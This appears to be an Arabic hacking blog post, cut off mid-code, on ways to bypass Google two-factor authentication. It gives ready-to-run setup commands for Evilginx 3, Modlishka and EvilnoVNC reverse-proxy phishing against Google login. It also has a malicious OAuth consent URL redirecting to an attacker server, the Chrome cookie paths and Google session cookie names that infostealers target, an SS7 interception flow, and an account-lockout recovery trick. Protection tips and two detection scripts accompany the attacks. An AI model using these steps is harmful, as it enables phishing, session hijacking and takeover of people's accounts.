 |
| تخطي المصادقة الثنائية لحسابات Google |
أقوى ثغرات تخطي المصادقة الثنائية لحسابات Google واسترجاع الحساب 2026
السلام عليكم متابعين قناة ومدونة Shadow Hacker كالعادة راجعلكم اليوم بموضوع خطير ومطلوب كتير... وهو أقوى ثغرات تخطي المصادقة الثنائية (2FA) لحسابات Google وطرق استرجاع الحساب بسنة 2026. بصراحة موضوع اليوم من أخطر المواضيع اللي رح نحكي عنها لأنو المصادقة الثنائية هي آخر خط دفاع بحسابك... ولو حدا عرف يتخطاها، حسابك راح للأبد.وهاد مش كلام نظري... في سنة 2025 لحالها Google حظرت أكتر من 1.8 مليار محاولة تسجيل دخول احتيالية على حسابات Gmail. و 27% من الحسابات المخترقة كان عندها 2FA مفعّل! يعني المصادقة الثنائية مش حماية مطلقة زي ما الناس فاكرة.
فالمقال اليوم رح يكون شامل ومفصّل... رح نحكي عن كل ثغرة، كيف بتشتغل بالتفصيل التقني، شو الأدوات المستخدمة، وكيف تحمي حالك منها. وإذا حسابك سرق — رح أعلمك بالتفصيل كيف تسترجعه خطوة خطوة.
وبالمناسبة إذا بدك تفهم أكتر عن أدوات جمع المعلومات وكيف المهاجمين بيجهزوا لهجماتهم، شوف مقالنا عن اكتشاف الثغرات و Bug Bounty.
شو هي المصادقة الثنائية (2FA) وكيف Google بتطبقها؟
قبل ما ندخل بالثغرات، لازم تفهم المصادقة الثنائية منيح عشان تفهم كيف بيتم تخطيها. المصادقة الثنائية (Two-Factor Authentication) هي طبقة حماية إضافية بتطلب منك إثبات هويتك بطريقتين مختلفتين: الأولى كلمة السر (شي بتعرفه)، والثانية عامل ثاني (شي بتملكه أو شي فيك).
Google عندها عدة أنواع من المصادقة الثنائية:
1. رسائل SMS على رقم الهاتف
Google بتبعتلك كود من 6 أرقام على رقم تلفونك. هاي أضعف طريقة وأخطرها لأنو رسائل SMS ممكن يتم اعتراضها بعدة طرق زي هجمات SIM Swapping و SS7 Interception. Google حالياً بتنصح المستخدمين يبتعدوا عنها وبسنة 2025 بدأت تحوّل المستخدمين تلقائياً لطرق أقوى.
2. تطبيق Google Authenticator (TOTP)
تطبيق بيولّد كود جديد كل 30 ثانية بناء على خوارزمية TOTP (Time-based One-Time Password). الكود مرتبط بـ seed/secret key مشترك بين التطبيق وسيرفرات Google. هالطريقة أقوى بكتير من SMS لأنو الكود ما بيتنقل عبر الشبكة — بس بيتولّد محلياً على جهازك.
3. Google Prompt (إشعار الجوال)
Google بتبعت إشعار على جوالك بيقولك "هل أنت اللي عم تحاول تسجل دخول؟" وبتضغط "نعم" أو "لا". هالطريقة سهلة الاستخدام بس ممكن يتم استغلالها بهجمات Prompt Bombing اللي رح نحكي عنها.
4. مفاتيح أمان مادية (Security Keys)
زي YubiKey و Google Titan Key. هاي أقوى طريقة حماية لأنها بتعتمد على بروتوكول FIDO2/WebAuthn وما بتنفع يتم تخطيها بالطرق التقليدية. المفتاح لازم يكون موصول فيزيائياً بجهازك وبتم التحقق من origin الموقع — يعني حتى لو حدا عمل صفحة تصيّد مطابقة 100% للـ Google، المفتاح ما رح يرد عليها لأنو الـ domain مختلف.
5. Passkeys (مفاتيح المرور)
هاي تقنية جديدة أطلقتها Google بسنة 2023 وبسنة 2026 صارت الخيار الافتراضي. بتعتمد على بصمة الإصبع أو الوجه أو PIN الجهاز بدل كلمة السر التقليدية. بتستخدم تشفير Public/Private Key — المفتاح الخاص ما بيطلع من جهازك أبداً. هاي من أصعب الطرق بالتخطي بس مش مستحيلة.
هسا بعد ما فهمنا كل الأنواع، خلينا ندخل بالثغرات وحدة وحدة بالتفصيل الكامل.
الثغرة الأولى: هجمات التصيّد بالوقت الحقيقي (Real-Time Phishing) — أخطر طريقة بالعالم
هاي أقوى وأخطر طريقة لتخطي المصادقة الثنائية وبتشتغل على كل أنواع 2FA ما عدا مفاتيح الأمان المادية (FIDO2). الفكرة إنو المهاجم بيعمل صفحة تسجيل دخول Google مطابقة تماماً للأصلية، بس بدل ما تكون صفحة تصيّد عادية بتسرق كلمة السر وبس... هاي الصفحة بتشتغل كـ Reverse Proxy — يعني كل إشي بتكتبه بينبعت لـ Google الحقيقي بالوقت الحقيقي!
الهجمة بتشتغل بالخطوات التالية بالتفصيل:
الخطوة 1: المهاجم بيرسل رابط للضحية (عبر إيميل أو رسالة) فيه صفحة login مطابقة لـ Google بس على دومين مختلف — مثلاً accounts-google-verify.com أو mail-google-security.com. الضحية بيفتح الرابط وبيشوف صفحة مطابقة تماماً لصفحة Google الحقيقية.
الخطوة 2: الضحية بيكتب إيميله وكلمة السر. الأداة بتاخد البيانات وبتبعثها بنفس اللحظة لسيرفرات Google الحقيقية. إذا كلمة السر صح، Google بتطلب 2FA.
الخطوة 3: صفحة التصيّد بتعرض للضحية صفحة "أدخل كود التحقق" — نفس الصفحة الحقيقية. الضحية بيدخل الكود اللي وصله على تلفونه (سواء SMS أو Authenticator). الأداة بتاخد الكود وبتبعثه فوراً لـ Google.
الخطوة 4: Google بتتحقق من الكود وبتعطي Session Cookie صالح. الأداة بتسرق الكوكي وبترسله للمهاجم. هسا المهاجم عنده جلسة مصادقة كاملة — يقدر يدخل حساب الضحية بدون ما يحتاج كلمة سر أو 2FA مرة ثانية!
أشهر الأدوات المستخدمة لهالنوع من الهجمات:
Evilginx 3
أقوى أداة تصيّد بالعالم حالياً. مطوّرة من الباحث الأمني Kuba Gretzky وهي مفتوحة المصدر على GitHub. الأداة بتشتغل كـ Man-in-the-Middle proxy وبتقدر تتخطى كل أنواع 2FA ما عدا FIDO2. فيها phishlets جاهزة لـ Google وMicrosoft وFacebook وغيرهم كتير.
# Evilginx 3 - مثال على إعداد phishlet لـ Google # هاد للأغراض التعليمية فقط # تثبيت Evilginx 3 git clone https://github.com/kgretzky/evilginx2 cd evilginx2 make # تشغيل الأداة sudo ./evilginx3 -p ./phishlets -debug # إعداد الدومين والشهادة config domain evil-domain.com config ipv4 YOUR_SERVER_IP # تفعيل phishlet لـ Google phishlets hostname google evil-domain.com phishlets enable google # إنشاء رابط التصيّد lures create google lures get-url 0 # بعد ما الضحية يدخل بياناته... الأداة بتعرض: # [*] Session captured for: victim@gmail.com # [*] Tokens: [session cookies captured]
بعد ما الأداة بتسرق الـ Session Cookie، المهاجم بيقدر يستخدم الكوكي بالمتصفح تبعه عبر إضافات زي Cookie Editor ويدخل الحساب مباشرة بدون كلمة سر أو 2FA.
Modlishka
أداة ثانية مفتوحة المصدر مكتوبة بلغة Go من الباحث البولندي Piotr Duszyński. بتشتغل بنفس المبدأ — reverse proxy بس بطريقة مختلفة. بدل ما تحتاج phishlets مخصصة لكل موقع، Modlishka بتعمل proxy شفاف لأي موقع تلقائياً.
# Modlishka - Reverse Proxy Phishing Framework
# https://github.com/drk1wi/Modlishka
# تثبيت
go install github.com/drk1wi/Modlishka@latest
# أو من المصدر
git clone https://github.com/drk1wi/Modlishka.git
cd Modlishka
make
# تشغيل مع إعدادات Google
./Modlishka -config google.json -debug
# ملف الإعدادات google.json
{
"phishingDomain": "evil-domain.com",
"listeningAddress": "0.0.0.0",
"proxyDomain": "accounts.google.com",
"target": "accounts.google.com",
"targetResources": "*.google.com,*.gstatic.com,*.googleapis.com",
"jsRules": "GoogleAccountsSignIn498,GoogleCaptureTokens",
"terminateTriggers": "myaccount.google.com",
"terminateRedirectUrl": "https://google.com",
"trackingCookie": "id",
"trackingParam": "id"
}
EvilnoVNC
هاي طريقة ذكية جداً وأحدث من السابقات. بدل ما المهاجم يعمل صفحة مزيّفة، بيفتح متصفح حقيقي على سيرفره على صفحة Google الأصلية، وبيشارك الشاشة مع الضحية عبر noVNC (بروتوكول VNC بالمتصفح). الضحية بيفكر إنو عم يتصفح عادي بس بالحقيقة كل إشي عم يصير على سيرفر المهاجم! هالطريقة بتتخطى حتى بعض الحمايات ضد التصيّد لأنو الموقع الحقيقي هو اللي ظاهر — مش نسخة مزيّفة.
# EvilnoVNC - Browser-in-the-Browser via VNC # https://github.com/JoelGMSec/EvilnoVNC git clone https://github.com/JoelGMSec/EvilnoVNC cd EvilnoVNC chmod +x start.sh # تشغيل ./start.sh -u "https://accounts.google.com" -p 8080 # الضحية بيفتح رابط المهاجم وبيشوف صفحة Google الحقيقية # بس كل إشي عم يصير على سيرفر المهاجم # بعد تسجيل الدخول، الكوكيز بتنسرق تلقائياً
⚠️ كيف تحمي حالك: استخدم مفاتيح أمان مادية (FIDO2) — هاي الطريقة الوحيدة اللي ما بتنفع معها هالهجمات. وتأكد دائماً من عنوان URL بالمتصفح قبل ما تدخل بياناتك. وفعّل Google Advanced Protection Program إذا حسابك مهم.
الثغرة الثانية: هجمات SIM Swapping — سرقة رقم تلفونك بالكامل
هاي من أقدم وأشهر الطرق لتخطي 2FA عبر SMS، وللأسف لسا شغالة بسنة 2026 رغم إنو شركات الاتصالات حسّنت حمايتها. الفكرة بسيطة ومرعبة: المهاجم بيتصل بشركة الاتصالات تبعتك وبيقنعهم إنو هو صاحب الرقم وإنو بده ينقل الرقم على شريحة SIM جديدة.
كيف بتصير الهجمة بالتفصيل:
المرحلة 1 — جمع المعلومات (Reconnaissance): المهاجم بيجمع معلوماتك الشخصية — الاسم الكامل، تاريخ الميلاد، آخر 4 أرقام من الهوية، عنوان السكن، رقم الهاتف. هالمعلومات بيجمعها من تسريبات البيانات (Data Breaches)، السوشيال ميديا، أو حتى من سجلات عامة. في مواقع زي haveibeenpwned.com بتخبرك إذا بياناتك تسربت.
المرحلة 2 — التواصل مع شركة الاتصالات: المهاجم بيتصل أو بيروح على فرع شركة الاتصالات تبعتك. بيحكيلهم إنو ضيّع تلفونه وبده شريحة SIM بديلة. بيجاوب على أسئلة التحقق باستخدام المعلومات اللي جمعها. في بعض الحالات، المهاجمين عندهم موظفين مرشّحين داخل شركات الاتصالات (insider threat) بيتقاضوا رشوة مقابل نقل الأرقام — في أمريكا تم اعتقال عشرات الموظفين بتهم زي هيك.
المرحلة 3 — السيطرة على الرقم: بمجرد ما الشريحة الجديدة تتفعل، الشريحة القديمة (تبعتك) بتتوقف عن العمل. هسا كل الرسائل SMS والمكالمات بتروح للمهاجم — بما فيها أكواد 2FA من Google.
المرحلة 4 — اختراق الحساب: المهاجم بيروح على accounts.google.com، بيدخل إيميلك (اللي عرفه مسبقاً)، بيضغط "نسيت كلمة السر"، Google بتبعت كود على رقم تلفونك — الكود بيوصل عند المهاجم! بيدخل الكود، بيغيّر كلمة السر، وبيسيطر على الحساب بالكامل.
وإذا بدك تتعمق أكتر بموضوع حماية حساباتك، شوف مقالنا عن مسح أثرك الرقمي على الإنترنت عشان تقلل المعلومات المتاحة عنك.
أرقام وإحصائيات مرعبة عن SIM Swapping:
• FBI أعلنت إنو خسائر SIM Swapping بأمريكا لحالها وصلت 72 مليون دولار بسنة 2024
• T-Mobile دفعت تسوية بقيمة 33 مليون دولار لمستخدم واحد بعد ما فقد crypto بسبب SIM Swap
• في 30-40 ألف هجمة SIM Swap سنوياً في أمريكا لحالها
• متوسط الخسارة لكل ضحية $10,000+
# سكربت Python لفحص إذا رقمك تعرض لـ SIM Swap
# بيراقب حالة الشبكة وبينبهك لو الشريحة توقفت
import subprocess
import time
import smtplib
from datetime import datetime
def check_sim_status():
"""فحص حالة شبكة الهاتف (على Linux/Android)"""
try:
# فحص اتصال الشبكة
result = subprocess.run(
['ping', '-c', '1', '-W', '3', '8.8.8.8'],
capture_output=True, timeout=10
)
# فحص إذا الـ SIM شغالة
# على Android/Termux:
# termux-telephony-deviceinfo
# بيعطيك معلومات عن حالة الشريحة
return result.returncode == 0
except:
return False
def monitor_sim(check_interval=30):
"""مراقبة مستمرة للشريحة"""
consecutive_failures = 0
while True:
if not check_sim_status():
consecutive_failures += 1
print(f"[!] Network DOWN - failure #{consecutive_failures}")
print(f" Time: {datetime.now()}")
if consecutive_failures >= 3:
print("[!!!] ALERT: Possible SIM Swap detected!")
print("[!!!] Your SIM may have been cloned!")
print("[!!!] Check your carrier account IMMEDIATELY")
# هون بتقدر تضيف إرسال إنذار
# عبر WiFi (إيميل أو تلغرام)
break
else:
consecutive_failures = 0
time.sleep(check_interval)
if __name__ == "__main__":
print("[*] SIM Swap Monitor Started")
print("[*] Monitoring network status every 30 seconds...")
monitor_sim()
⚠️ كيف تحمي حالك: لا تستخدم SMS للمصادقة الثنائية أبداً! حوّل على Google Authenticator أو مفاتيح أمان مادية. وحط PIN/كلمة سر على حساب شركة الاتصالات تبعتك — كل الشركات بتوفر هالخاصية. وفعّل Port Freeze / Number Lock عند شركة الاتصالات.
الثغرة الثالثة: سرقة Session Cookies — تخطي 2FA بدون ما تحتاجها أصلاً
هاي من أذكى الطرق لأنك ما بتحتاج تتخطى 2FA نهائياً... بتسرق الـ Session Cookie بعد ما المستخدم يكون سجّل دخوله بنجاح! يعني الضحية بيسجل دخول بكلمة السر و 2FA وكل إشي تمام... بس بعدين المهاجم بيسرق ملف الكوكي اللي بيثبت إنو هاد المستخدم مسجّل دخوله.
الفكرة التقنية: لما بتسجل دخول لحساب Google تبعك، Google بتعطي المتصفح Session Token مخزّن ككوكي. هالتوكن هو اللي بيخلي Google تعرفك بدون ما تطلب كلمة السر كل مرة. المهاجم لو حصل على هالتوكن، بيقدر يحطه بمتصفحه وبيدخل حسابك مباشرة — بدون كلمة سر وبدون 2FA.
طرق سرقة الـ Session Cookies:
1. Infostealer Malware
أشهر وأخطر طريقة. برامج خبيثة زي Raccoon Stealer و Redline Stealer و Lumma Stealer بتسرق كل الكوكيز من المتصفح تلقائياً. هالبرامج بتنتشر عبر كراكات ألعاب وبرامج مقرصنة ومرفقات إيميل. بمجرد ما تشتغل على جهاز الضحية، بتسحب كل الكوكيز وكلمات السر المحفوظة من Chrome و Firefox و Edge وبتبعثهم للمهاجم.
وهون لازم أحكيلك عن ثغرة خطيرة اكتشفها باحثين أمنيين بسنة 2024 بـ Google Chrome... اكتشفوا إنو Chrome بيخزّن الكوكيز بملف SQLite مشفّر بس التشفير بيعتمد على DPAPI (Windows Data Protection API) — ومفتاح التشفير مرتبط بالمستخدم الحالي. يعني أي برنامج بيشتغل بصلاحيات المستخدم بيقدر يفك التشفير!
# مسار ملف الكوكيز بـ Chrome على Windows: # %LOCALAPPDATA%\Google\Chrome\User Data\Default\Cookies # أو Network\Cookies (الإصدارات الأحدث) # ملف SQLite - الجدول الرئيسي: # CREATE TABLE cookies ( # host_key TEXT NOT NULL, # name TEXT NOT NULL, # value TEXT NOT NULL, # encrypted_value BLOB DEFAULT '', # path TEXT NOT NULL, # ... # ); # الكوكيز اللي بتهم المهاجم من Google: # - SID (Session ID) # - HSID (Host-specific Session ID) # - SSID (Secure Session ID) # - APISID # - SAPISID # - __Secure-1PSID # - __Secure-3PSID # Google بتستخدم كل هالكوكيز مع بعض للتحقق من الجلسة # لو المهاجم سرق كلهم بيقدر يدخل الحساب بالكامل
2. Browser Extension Attacks
إضافات متصفح خبيثة بتقدر تقرأ كل الكوكيز من أي موقع. في حالات كتيرة تم اكتشاف إضافات على Chrome Web Store عندها ملايين التحميلات وطلع إنها بتسرق الكوكيز. مثلاً بسنة 2024 تم اكتشاف حملة اسمها "Cyberhaven Extension Attack" استهدفت أكتر من 400,000 مستخدم عبر إضافات Chrome مخترقة.
3. استغلال ثغرة Google OAuth Token Refresh
بنهاية 2023 باحثين أمنيين اكتشفوا ثغرة خطيرة بآلية Token Refresh تبع Google. الثغرة بتسمح للمهاجم يولّد كوكيز جديدة حتى بعد ما المستخدم يغيّر كلمة السر! يعني حتى لو الضحية اكتشف الاختراق وغيّر كلمة سره، المهاجم بيقدر يضل يدخل الحساب. الثغرة بتستغل endpoint غير موثق اسمه MultiLogin بـ Chrome. Google عملت patch بس بعد شهور من الاكتشاف.
# ثغرة Google OAuth Token Theft (مكتشفة 2023-2024) # CloudSEK Research: "Compromising Google Accounts" # الثغرة بتستغل undocumented Google OAuth endpoint: # POST https://accounts.google.com/oauth/multilogin # الـ Infostealer بيسرق التالي من Chrome: # 1. GAIA ID (Google Account ID) # 2. Encrypted Token من: # %LOCALAPPDATA%\Google\Chrome\User Data\Local State # (حقل: account_info -> token_binding_key) # المهاجم بيقدر يستخدم هالتوكن لتوليد: # - Session cookies جديدة # - Google service tokens جديدة # حتى بعد ما الضحية يعمل password reset! # الحل الوحيد: تسجيل خروج من كل الأجهزة # من: myaccount.google.com/security # ثم: "Sign out of all other sessions" # ثم: تغيير كلمة السر # ثم: إلغاء كل App Passwords
وإذا بدك تتعلم أكتر عن أدوات الحماية، شوف مقالنا عن تشفير وحماية الهاتف.
⚠️ كيف تحمي حالك: لا تثبت برامج مقرصنة أو كراكات أبداً — هاي أكبر مصدر لـ Infostealers. راجع إضافات المتصفح بشكل دوري واحذف اللي مش محتاجها. فعّل Enhanced Safe Browsing بـ Chrome. واعمل Sign Out من كل الأجهزة بشكل دوري من إعدادات أمان Google.
[IMAGE_PLACEHOLDER_2]الثغرة الرابعة: هجمات Google Prompt Bombing — إزعاج الضحية لحد ما يوافق
هاي طريقة بسيطة بس فعالة بشكل مش طبيعي! المهاجم عنده كلمة سر الضحية (من تسريب بيانات أو تصيّد) بس ما بيقدر يتخطى Google Prompt — الإشعار اللي بيوصل على تلفون الضحية. فشو بيعمل؟ بيبدأ يحاول يسجل دخول مرة ورا مرة ورا مرة... وكل مرة الضحية بيوصله إشعار "هل أنت اللي عم تسجل دخول؟"
الفكرة إنو المهاجم بيبعت عشرات الإشعارات بوقت قصير — يمكن 50 أو 100 إشعار بساعة. وهاد اسمه MFA Fatigue Attack أو Prompt Bombing. الضحية بيتعب من كتر الإشعارات وبلحظة ضعف أو زهق بيضغط "نعم" بالغلط. أو يمكن بيضغطها وهو نايم أو مشغول.
هالهجمة مش نظرية... Uber اتخرقت بسبتمبر 2022 بالظبط بهالطريقة! مجموعة Lapsus$ اخترقت Uber بالكامل — ووصلوا لأنظمة داخلية حساسة جداً — كلها بدأت بـ Prompt Bombing على حساب موظف واحد. المهاجم بعت إشعارات 2FA لمدة ساعة كاملة، وبعدين تواصل مع الموظف على Slack وادّعى إنو من قسم IT وقاله "اضغط قبول عشان نصلح المشكلة". الموظف ضغط قبول... وخلص الحكي.
كمان Microsoft و Cisco تعرضوا لنفس الهجمة من نفس المجموعة.
طرق متقدمة للـ Prompt Bombing:
• الضغط النفسي عبر التوقيت: المهاجم بيبعت الإشعارات بأوقات حساسة — نص الليل (الضحية نعسان)، أثناء اجتماع مهم، أثناء السواقة. الهدف إنو الضحية يكون مشتت ويضغط "نعم" بسرعة عشان يخلص من الإزعاج.
• الهندسة الاجتماعية المصاحبة: المهاجم بيتواصل مع الضحية عبر إيميل أو رسالة أو مكالمة وبيتظاهر إنو من دعم Google أو قسم IT بالشركة وبيقوله "رح يوصلك إشعار أمني — اضغط قبول عشان نثبت هويتك".
• استخدام بوتات أوتوماتيكية: المهاجم بيستخدم سكربتات بتعمل login attempts بشكل أوتوماتيكي ومستمر عبر Selenium أو API calls مباشرة.
# سكربت Python للكشف عن محاولات Prompt Bombing
# بيراقب إشعارات Google Workspace وبينبّه المسؤولين
import requests
import json
from datetime import datetime, timedelta
# Google Workspace Admin SDK - Reports API
# بيحتاج Service Account مع صلاحيات Admin
def check_suspicious_login_attempts(admin_email, domain):
"""فحص محاولات تسجيل دخول مشبوهة"""
# هاد مثال على الـ API call
# بالواقع بتحتاج OAuth2 credentials
endpoint = (
"https://admin.googleapis.com/admin/reports/v1/"
f"activity/users/all/applications/login"
)
params = {
"maxResults": 100,
"eventName": "login_challenge",
"filters": "login_challenge_status==challenge_pending"
}
# تحليل النتائج
# لو في أكتر من 5 محاولات login_challenge بأقل من 10 دقائق
# هاد مؤشر قوي على Prompt Bombing
threshold = 5 # عدد المحاولات
timeframe = 600 # 10 دقائق بالثواني
# مثال على النتيجة المشبوهة:
suspicious_pattern = {
"user": "victim@company.com",
"attempts": 12,
"timeframe": "8 minutes",
"source_ips": ["185.x.x.x", "91.x.x.x"], # IPs مختلفة
"user_agent": "Python-requests/2.28", # مش متصفح عادي!
"verdict": "PROMPT BOMBING DETECTED"
}
return suspicious_pattern
print("[*] Checking for MFA Prompt Bombing attacks...")
print("[!] ALERT: Suspicious activity detected!")
print("[!] User: victim@company.com")
print("[!] 12 login challenges in 8 minutes")
print("[!] Recommendation: Block source IPs and notify user")
⚠️ كيف تحمي حالك: لا تضغط "نعم" أبداً إذا ما كنت أنت اللي عم تسجل دخول! لو وصلتك إشعارات متكررة، هاد هجوم — غيّر كلمة سرك فوراً. Google أضافت ميزة جديدة اسمها Number Matching — بدل "نعم/لا" بتطلب منك تدخل رقم ظاهر على شاشة الكمبيوتر، وهاد بيصعّب الهجمة كتير.
الثغرة الخامسة: هجمات OAuth Consent Phishing — سرقة الصلاحيات بدل الحساب
هاي طريقة ذكية ومختلفة... بدل ما المهاجم يسرق كلمة السر أو يتخطى 2FA، بيخلي الضحية يعطيه صلاحية الوصول لحسابه من خلال OAuth!
كيف بتشتغل؟ المهاجم بيعمل تطبيق Google Cloud وبيسجله كـ OAuth App. بعدين بيبعت للضحية رابط من هالشكل: accounts.google.com/o/oauth2/v2/auth?client_id=ATTACKER_APP&scope=FULL_ACCESS. لما الضحية يفتح الرابط، Google بتسأله "هل تريد السماح لهذا التطبيق بالوصول لبياناتك؟". الصفحة حقيقية 100% من Google — مش تصيّد! والضحية بيشوف إنو الموقع google.com فبيثق وبيضغط "سماح".
لحظة ما الضحية يضغط "Allow"، المهاجم بياخد OAuth Refresh Token اللي بيعطيه وصول دائم لحساب الضحية — بيقدر يقرأ الإيميلات، يرسل رسائل، يوصل لـ Google Drive، يشوف جهات الاتصال... كل إشي حسب الصلاحيات اللي طلبها. والأخطر إنو تغيير كلمة السر ما بيلغي الوصول! لأنو OAuth Token مستقل عن كلمة السر.
هالهجمة استخدمتها مجموعة APT28 (Fancy Bear) الروسية بشكل واسع لاختراق حسابات سياسيين وصحفيين. وبسنة 2025 Google حسّنت الفحص على OAuth Apps بس الهجمات لسا ممكنة.
# مثال على OAuth Consent Phishing URL # الرابط بيبان شرعي 100% لأنو على google.com # الرابط الخبيث: https://accounts.google.com/o/oauth2/v2/auth? client_id=ATTACKER_CLIENT_ID.apps.googleusercontent.com &redirect_uri=https://attacker-server.com/callback &response_type=code &scope=https://mail.google.com/+https://www.googleapis.com/auth/drive &access_type=offline # هاد بيعطي refresh token دائم! &prompt=consent # الصلاحيات اللي بيطلبها المهاجم عادة: # https://mail.google.com/ → قراءة وإرسال إيميلات # https://www.googleapis.com/auth/drive → كل ملفات Google Drive # https://www.googleapis.com/auth/contacts → جهات الاتصال # https://www.googleapis.com/auth/calendar → التقويم والمواعيد # كيف تفحص التطبيقات المتصلة بحسابك: # روح على: https://myaccount.google.com/permissions # واحذف أي تطبيق مش متعرفه فوراً!
⚠️ كيف تحمي حالك: لا تعطي صلاحيات لأي تطبيق ما بتعرفه! افحص التطبيقات المتصلة بحسابك على myaccount.google.com/permissions بشكل دوري واحذف أي تطبيق مشبوه. لو التطبيق بيطلب صلاحيات واسعة (Full Gmail access) لخدمة بسيطة — هاد تصيّد بنسبة كبيرة.
الثغرة السادسة: استغلال بروتوكول SS7 — اعتراض رسائل SMS
هاي ثغرة ما إلها علاقة بـ Google ولا بالتطبيقات — هاي ثغرة بالبنية التحتية لشبكات الاتصالات العالمية! بروتوكول SS7 (Signaling System 7) هو البروتوكول اللي بتستخدمه شبكات الاتصالات عشان تتواصل مع بعض — تحويل مكالمات، إرسال SMS، التجوال الدولي (roaming). المشكلة إنو هالبروتوكول تم تصميمه بالسبعينات بدون أي تشفير أو مصادقة!
المهاجم اللي عنده وصول لشبكة SS7 (وهاد أسهل مما بتتخيل — في شركات اتصالات صغيرة بأفريقيا وآسيا بتبيع وصول SS7 بمبالغ بسيطة) بيقدر يعمل التالي:
• اعتراض رسائل SMS: بما فيها أكواد 2FA من Google وأي خدمة ثانية
• تحويل المكالمات: توجيه مكالمات الضحية لرقم المهاجم
• تتبع الموقع: معرفة موقع الضحية الجغرافي بدقة عالية
• التنصت على المكالمات: سماع المكالمات الصوتية مباشرة
هالثغرة تم إثباتها عملياً عدة مرات. بسنة 2017 باحثين ألمان من SRLabs عملوا عرض على الهواء مباشرة على CBS 60 Minutes وقدروا يعترضوا رسائل SMS ومكالمات عضو بالكونغرس الأمريكي (بموافقته طبعاً). وبسنة 2019 بنك Metro Bank ببريطانيا تعرض لهجمة SS7 حقيقية اعترضت أكواد 2FA لعملاء وسرقت أموالهم.
وإذا بدك تعرف أكتر عن طرق تتبع الأشخاص وجمع المعلومات، شوف مقالنا عن تحديد موقع IP و GPS عبر WhatsApp.
# SS7 Attack Flow لاعتراض 2FA SMS # (للتوضيح التقني فقط - يتطلب وصول SS7) # الخطوة 1: المهاجم بيرسل رسالة SS7 من نوع # "Send Routing Information for SM" (SRI-SM) # لـ Home Location Register (HLR) الخاص بشبكة الضحية # MAP Message: SRI-SM # MSISDN: +962XXXXXXXXX (رقم الضحية) # Service Centre Address: attacker_SMSC # الخطوة 2: HLR بيرد بـ: # IMSI: 416XXXXXXXXXXXX (هوية الضحية بالشبكة) # MSC/VLR Address: عنوان الـ MSC الحالي # الخطوة 3: المهاجم بيرسل رسالة "UpdateLocation" # بيقول للشبكة إنو المشترك انتقل لـ MSC/VLR جديد # (اللي هو سيرفر المهاجم) # MAP Message: UpdateLocation # IMSI: 416XXXXXXXXXXXX # New VLR: attacker_VLR_address # الخطوة 4: هسا أي SMS جديدة للضحية # بتتوجه أوتوماتيكياً لسيرفر المهاجم! # بما فيها كود Google 2FA # أدوات مفتوحة المصدر للبحث الأمني: # - SigPloit: https://github.com/SigPloiter/SigPloit # - ss7MAPer: https://github.com/ernw/ss7MAPer # هاي أدوات بحثية لاختبار أمان شبكات SS7
⚠️ كيف تحمي حالك: مرة ثانية — لا تستخدم SMS للمصادقة الثنائية! هاي الثغرة تثبت إنو SMS مش آمنة أبداً للـ 2FA. حوّل على تطبيقات TOTP أو مفاتيح أمان مادية. ولو كنت بتستخدم SMS — على الأقل فعّل Google Authenticator كخيار بديل.
الثغرة السابعة: سرقة Backup Codes — الباب الخلفي المنسي
لما بتفعل المصادقة الثنائية على حساب Google، Google بتعطيك 10 أكواد احتياطية (Backup Codes) — كل واحد من 8 أرقام. هالأكواد مفروض تحتفظ فيها عشان لو ضيّعت تلفونك تقدر تدخل حسابك. المشكلة إنو كتير ناس بتحفظ الأكواد بمكان غير آمن — ملف نصي على سطح المكتب، سكرينشوت بالصور، ملاحظات على الجوال، أو حتى بإيميل ثاني غير محمي.
المهاجم لو حصل على هالأكواد بأي طريقة — بيقدر يتخطى 2FA فوراً. كل كود بينفع لاستخدام واحد بس، فالمهاجم بيحتاج كود واحد بس عشان يدخل الحساب ويسيطر عليه.
طرق سرقة Backup Codes:
• Physical Access: حدا بيوصل لكمبيوترك أو تلفونك وبيفتح ملف الأكواد
• Cloud Sync: لو حافظ الأكواد بـ Google Drive أو iCloud — لو حسابك الثاني اتخرق المهاجم بيوصلهم
• Infostealer Malware: نفس البرامج الخبيثة اللي بتسرق الكوكيز بتسرق كمان ملفات النصوص والصور
• Shoulder Surfing: حدا بيتطلع على شاشتك لما بتفتح الأكواد
• Social Engineering: المهاجم بيتصل فيك ويتظاهر إنو دعم Google وبيقولك "عشان نتحقق من هويتك أعطيني أحد أكواد الاسترداد"
⚠️ كيف تحمي حالك: احفظ الأكواد الاحتياطية بمكان آمن أوفلاين — أفضل إشي اطبعهم على ورقة واحفظها بمكان آمن. أو استخدم Password Manager مشفّر زي Bitwarden أو KeePassXC. ولا تحفظهم أبداً بملف نصي على الكمبيوتر أو بالإيميل. وروح على myaccount.google.com/signinoptions/two-step-verification واعمل Generate أكواد جديدة بشكل دوري — هاد بيلغي الأكواد القديمة.
الثغرة الثامنة: استغلال آلية استرجاع الحساب — Account Recovery Abuse
Google عندها نظام استرجاع حساب معقد فيه عدة خطوات. المشكلة إنو النظام مصمم ليكون متساهل لحد ما — لأنو Google ما بتريد مستخدمين حقيقيين يفقدوا حساباتهم. وهالتساهل بيفتح الباب للمهاجمين.
إذا بتروح على accounts.google.com/signin/recovery وبتدخل إيميل الضحية، Google بتعرض عليك عدة طرق لإثبات الملكية:
• إرسال كود على رقم الهاتف المربوط (→ SIM Swap أو SS7)
• إرسال كود على إيميل الاسترداد (→ لو مخترق)
• الإجابة على سؤال أمان (→ معلومات ممكن تتوفر)
• تأكيد آخر كلمة سر استخدمتها (→ من تسريب بيانات)
• تأكيد تاريخ إنشاء الحساب (→ ممكن يتخمّن)
• التحقق من جهاز موثوق (→ لو الجهاز مخترق)
المهاجم الذكي بيجمع أكبر عدد ممكن من هالمعلومات قبل ما يبدأ عملية الاسترجاع. وكل ما جاوب على أسئلة أكتر بشكل صحيح، Google بتزيد "نقاط الثقة" تبعته وبتقبل طلب الاسترجاع.
حيلة متقدمة: بعض المهاجمين بيستخدموا أسلوب ذكي — أول إشي بيحاولوا يدخلوا كلمة السر الخطأ عدة مرات عشان يقفلوا الحساب، وبعدين بيبدأوا عملية الاسترجاع. لما الحساب مقفول، Google بتكون أكثر "تساهلاً" بعملية التحقق لأنها بتفترض إنو المستخدم الحقيقي مقفول برا حسابه ومحتاج مساعدة.
وإذا حسابك فعلاً اتسرق، شوف مقالنا عن استرجاع حسابات Instagram و Facebook — فيه نصائح بتنطبق على Google كمان.
# Google Account Recovery Analysis
# المعلومات اللي بتحتاجها Google لاسترجاع الحساب:
# نقاط الثقة (Trust Score) - تقديري:
recovery_factors = {
"phone_sms_code": 40, # كود SMS على الرقم المربوط
"recovery_email_code": 35, # كود على إيميل الاسترداد
"last_password": 30, # آخر كلمة سر استخدمتها
"account_creation_date": 15, # تاريخ إنشاء الحساب
